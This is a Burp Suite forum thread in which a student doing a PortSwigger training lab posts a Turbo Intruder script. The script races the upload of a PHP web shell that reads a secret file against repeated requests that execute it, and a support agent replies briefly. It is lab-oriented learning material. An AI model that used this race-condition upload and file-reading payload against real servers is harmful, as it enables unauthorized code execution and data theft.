Burp Suite User Forum

Login to post

Turbo Intruder does not send requests

Student921 | Last updated: Jun 05, 2022 05:19PM UTC

Hi, just doing the LAB: Web shell upload via race condition but everytime i start the Attack with Turbo intruder, it sends no requests but puts them in Queued. Here's my code: def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,) request1 = ''' POST /my-account/avatar HTTP/1.1 Host: 0a2c0086038f77f8c0bb9a11003200e0.web-security-academy.net Cookie: session=fJBs6NScIngnOGf4BNFhblWJEyeJfBSy User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------3221391364914682276437579228 Content-Length: 544 Origin: https://0a2c0086038f77f8c0bb9a11003200e0.web-security-academy.net Referer: https://0a2c0086038f77f8c0bb9a11003200e0.web-security-academy.net/my-account Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close -----------------------------3221391364914682276437579228 Content-Disposition: form-data; name="avatar"; filename="extract.php" Content-Type: application/octet-stream <?php echo file_get_contents('/home/carlos/secret'); ?> -----------------------------3221391364914682276437579228 Content-Disposition: form-data; name="user" wiener -----------------------------3221391364914682276437579228 Content-Disposition: form-data; name="csrf" ZcofzgnPJsTLuZptwviIUu2u5h8K9E0g -----------------------------3221391364914682276437579228-- ''' request2 = ''' GET /files/avatars/extract.php HTTP/1.1 Host: 0a2c0086038f77f8c0bb9a11003200e0.web-security-academy.net Cookie: session=fJBs6NScIngnOGf4BNFhblWJEyeJfBSy User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: image/avif,image/webp,*/* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: https://0a2c0086038f77f8c0bb9a11003200e0.web-security-academy.net/my-account Sec-Fetch-Dest: image Sec-Fetch-Mode: no-cors Sec-Fetch-Site: same-origin Te: trailers Connection: close\r\n\r\n ''' # the 'gate' argument blocks the final byte of each request until openGate is invoked engine.queue(request1, gate='race1') for x in range(5): engine.queue(request2, gate='race1') # wait until every 'race1' tagged request is ready # then send the final byte of each request # (this method is non-blocking, just like queue) engine.openGate('race1') engine.complete(timeout=60) def handleResponse(req, interesting): table.add(req)

Michelle, PortSwigger Agent | Last updated: Jun 06, 2022 11:02AM UTC

Thanks for your message. Are you able to send the same two requests via Burp's Repeater tab?

Student921 | Last updated: Jun 06, 2022 04:05PM UTC

Hi, just tried it again for the first time today and it suddenly worked. Thank you

You need to Log in to post a reply. Or register here, for free.